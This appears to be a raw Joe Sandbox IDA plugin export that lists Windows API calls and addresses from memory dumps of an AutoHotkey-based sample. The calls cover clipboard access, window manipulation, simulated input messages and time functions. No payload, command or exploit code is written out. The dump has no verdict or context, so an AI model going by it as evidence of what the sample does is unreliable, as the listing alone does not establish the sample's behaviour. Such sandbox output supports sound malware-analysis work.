Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004261A4, Relevance: 9.2, APIs: 6, Instructions: 177time

APIs

Part of subcall function 00433450: GetWindowRect.USER32(00000000,?), ref: 0043347D
Part of subcall function 00433450: MoveWindow.USER32(00000000,?,?,?,?,00000001), ref: 00433537

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 0042649F, Relevance: 9.2, APIs: 6, Instructions: 177time

APIs

Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 00450188
Part of subcall function 00450110: IsWindowEnabled.USER32(00000000), ref: 004501BC
Part of subcall function 00450110: IsWindowVisible.USER32(00000000), ref: 004501E6
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000130B,00000000,00000000,00000002,000007D0,?), ref: 00450224
Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 00450259
Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 004502BB
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000188,00000000,00000000,00000002,000007D0,?), ref: 00450325
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018A,?,00000000,00000002,000007D0,?), ref: 0045034B
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000189,?,004ABB26,00000002,000007D0,?), ref: 004503DA
Part of subcall function 00450110: GetClassNameA.USER32(00000000,?,00000020), ref: 00450419
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018B,00000000,00000000,00000002,00001388,?), ref: 004504B5
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,0000018A,00000000,00000000,00000002,00001388,?), ref: 004504F4
Part of subcall function 00450110: SendMessageTimeoutA.USER32(00000000,00000189,00000000,004ABB26,00000002,00001388,?), ref: 00450592

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00425C93, Relevance: 9.2, APIs: 6, Instructions: 177time

APIs

Part of subcall function 0044F220: GetForegroundWindow.USER32 ref: 0044F286
Part of subcall function 0044F220: IsIconic.USER32(00000000), ref: 0044F293
Part of subcall function 0044F220: GetWindowRect.USER32(00000000,?), ref: 0044F2A7
Part of subcall function 0044F220: ClientToScreen.USER32(00000000,?), ref: 0044F2BD
Part of subcall function 0044F220: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0044F2FA
Part of subcall function 0044F220: GetDC.USER32(00000000), ref: 0044F302
Part of subcall function 0044F220: GetPixel.GDI32(00000000,00000000,00000000), ref: 0044F35E
Part of subcall function 0044F220: DeleteDC.GDI32(00000000), ref: 0044F36E
Part of subcall function 0044F220: ReleaseDC.USER32(00000000,00000000), ref: 0044F378

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004282CC, Relevance: 9.2, APIs: 6, Instructions: 176time

APIs

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Part of subcall function 00472E30: GetCurrentProcess.KERNEL32(00000000,?,004282EF), ref: 00472E3E
Part of subcall function 00472E30: IsWow64Process.KERNEL32(00000000,?,004282EF), ref: 00472E45

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 00426467, Relevance: 9.2, APIs: 6, Instructions: 176time

APIs

Part of subcall function 0044F970: SendMessageTimeoutA.USER32(00000000,000000F0,00000000,00000000,00000002,000007D0,?), ref: 0044F9EE
Part of subcall function 0044F970: GetWindowThreadProcessId.USER32(?,00000000), ref: 0044FA17
Part of subcall function 0044F970: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 0044FA46
Part of subcall function 0044F970: SetActiveWindow.USER32(?), ref: 0044FA61
Part of subcall function 0044F970: GetWindowRect.USER32(00000000,?), ref: 0044FA6D
Part of subcall function 0044F970: PostMessageA.USER32(00000000,00000201,00000001,?), ref: 0044FABB
Part of subcall function 0044F970: PostMessageA.USER32(00000000,00000202,00000000,?), ref: 0044FAC6
Part of subcall function 0044F970: AttachThreadInput.USER32(00000E10,?,00000000), ref: 0044FAD9
Part of subcall function 0044F970: EnableWindow.USER32(00000000,00000001), ref: 0044FAE4
Part of subcall function 0044F970: ShowWindow.USER32(00000000,00000004), ref: 0044FB2A
Part of subcall function 0044F970: ShowWindow.USER32(00000000,00000000), ref: 0044FB35
Part of subcall function 0044F970: GetWindowLongA.USER32(00000000,00000000), ref: 0044FB66
Part of subcall function 0044F970: SetLastError.KERNEL32(00000000), ref: 0044FBCA
Part of subcall function 0044F970: SetWindowLongA.USER32(00000000,?,00000000), ref: 0044FBD7
Part of subcall function 0044F970: GetLastError.KERNEL32 ref: 0044FBE1
Part of subcall function 0044F970: GetWindowLongA.USER32(00000000,?), ref: 0044FBF1
Part of subcall function 0044F970: InvalidateRect.USER32(00000000,00000000,00000001), ref: 0044FC04
Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,0000014F,00000000,00000000,00000002,000007D0,?), ref: 0044FC48
Part of subcall function 0044F970: PostMessageA.USER32(?,00000100,?,?), ref: 0044FCCC
Part of subcall function 0044F970: PostMessageA.USER32(?,00000101,?,?), ref: 0044FCFA
Part of subcall function 0044F970: GetClassNameA.USER32(?,?,00000020), ref: 0044FD14
Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,00000180,00000000,7619B40E,00000002,000007D0,?), ref: 0044FD65
Part of subcall function 0044F970: GetClassNameA.USER32(?,?,00000020), ref: 0044FDB2
Part of subcall function 0044F970: SendMessageTimeoutA.USER32(?,00000182,-00000001,00000000,00000002,000007D0,?), ref: 0044FE03

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004276A6, Relevance: 9.2, APIs: 6, Instructions: 176time

APIs

Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FB63
Part of subcall function 0042FAE0: IsWindow.USER32(?), ref: 0042FCA9
Part of subcall function 0042FAE0: IsWindowVisible.USER32(?), ref: 0042FCC4
Part of subcall function 0042FAE0: ShowWindow.USER32(?,00000004), ref: 0042FCD4
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0042FD93
Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDAC
Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDC1
Part of subcall function 0042FAE0: SetWindowTextA.USER32(?,?), ref: 0042FDD3
Part of subcall function 0042FAE0: DestroyWindow.USER32(?), ref: 0042FDF3
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE07
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE11
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE1B
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE2A
Part of subcall function 0042FAE0: DestroyCursor.USER32(?), ref: 0042FE2E
Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 0042FEED
Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FFFE
Part of subcall function 0042FAE0: CreateSolidBrush.GDI32(00000000), ref: 0043008C
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004301F5
Part of subcall function 0042FAE0: __Stoull.NTSTC_LIBCMT ref: 0043024D
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0043028D
Part of subcall function 0042FAE0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00430338
Part of subcall function 0042FAE0: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00430347
Part of subcall function 0042FAE0: GetStockObject.GDI32(00000011), ref: 00430353
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,00000000), ref: 0043035F
Part of subcall function 0042FAE0: GetTextFaceA.GDI32(00000000,00000040,?), ref: 00430377
Part of subcall function 0042FAE0: GetTextMetricsA.GDI32(00000000,?), ref: 00430386
Part of subcall function 0042FAE0: GetIconInfo.USER32(00000000,?), ref: 0043045E
Part of subcall function 0042FAE0: GetObjectA.GDI32(00000000,00000018,?), ref: 00430486
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0043055E
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 00430568
Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 00430581
Part of subcall function 0042FAE0: SetRect.USER32(?,00000000,00000000,?,?), ref: 004305B7
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430608
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0043063A
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430660
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00430699
Part of subcall function 0042FAE0: SelectObject.GDI32(?,?), ref: 004306AF
Part of subcall function 0042FAE0: DrawTextA.USER32(?,?,000000FF,?,00000450), ref: 004306F8
Part of subcall function 0042FAE0: MulDiv.KERNEL32(?,00000008,00000048), ref: 00430751
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 0043075A
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,?,00000048), ref: 00430798
Part of subcall function 0042FAE0: CreateFontA.GDI32(00000000,?,?), ref: 004307A1
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 004307F5
Part of subcall function 0042FAE0: DrawTextA.USER32(00000000,?,000000FF,?,00000410), ref: 00430837
Part of subcall function 0042FAE0: SelectObject.GDI32(00000000,?), ref: 00430856
Part of subcall function 0042FAE0: DeleteDC.GDI32(00000000), ref: 0043085D
Part of subcall function 0042FAE0: AdjustWindowRectEx.USER32(?,?,00000000,00000008), ref: 004308B6
Part of subcall function 0042FAE0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004308E6
Part of subcall function 0042FAE0: CreateWindowExA.USER32(?,AutoHotkey2,00000000,?,80000000,00000008,?,?,00000000,00000000,00400000,00000000), ref: 004309AF
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 00430A00
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000080,00000001,00000000), ref: 00430A15
Part of subcall function 0042FAE0: GetClientRect.USER32(?,?), ref: 00430A20
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430A7A
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430A94
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000200,msctls_progress32,00000000,50000001,?,?,?,?,?,00000000,00000000,00000000), ref: 00430AD9
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000406,?,?), ref: 00430B36
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000409,00000000,?), ref: 00430B5C
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00002001,00000000,?), ref: 00430B74
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 00430B8D
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00430B9C
Part of subcall function 0042FAE0: CreateWindowExA.USER32(00000000,static,?,00000000,?,?,?,?,?,00000000,00400000,00000000), ref: 00430BE5
Part of subcall function 0042FAE0: SendMessageA.USER32(00000000,00000030,?,00000001), ref: 00430C03

Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A

Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2

Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
Part of subcall function 00471750: __alldiv.INT64 ref: 00471816

GetTickCount.KERNEL32(?,?), ref: 00423FDA

Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
__alldiv.INT64 ref: 00425256

Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A

Memory Dump Source

Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ss.jbxd

Function 004276D9, Relevance: 9.2, APIs: 6, Instructions: 176time

APIs

Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FB63
Part of subcall function 0042FAE0: IsWindow.USER32(?), ref: 0042FCA9
Part of subcall function 0042FAE0: IsWindowVisible.USER32(?), ref: 0042FCC4
Part of subcall function 0042FAE0: ShowWindow.USER32(?,00000004), ref: 0042FCD4
Part of subcall function 0042FAE0: SendMessageA.USER32(?,00000402,?,00000000), ref: 0042FD93
Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDAC
Part of subcall function 0042FAE0: SendMessageA.USER32(?,0000000C,00000000,?), ref: 0042FDC1
Part of subcall function 0042FAE0: SetWindowTextA.USER32(?,?), ref: 0042FDD3
Part of subcall function 0042FAE0: DestroyWindow.USER32(?), ref: 0042FDF3
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE07
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE11
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE1B
Part of subcall function 0042FAE0: DeleteObject.GDI32(?), ref: 0042FE2A
Part of subcall function 0042FAE0: DestroyCursor.USER32(?), ref: 0042FE2E
Part of subcall function 0042FAE0: MulDiv.KERNEL32(0000012C,00000060,00000060), ref: 0042FEED
Part of subcall function 0042FAE0: _strncpy.LIBCMT ref: 0042FFFE
Part of subcall function 0042FAE0: CreateSolidBrush.GDI32(00000000), ref: 0043008C
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 004301F5
Part of subcall function 0042FAE0: __Stoull.NTSTC_LIBCMT ref: 0043024D
Part of subcall function 0042FAE0: MulDiv.KERNEL32(00000000,00000060,00000060), ref: 0043028D
Part of subcall function 0042FAE0: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00430338
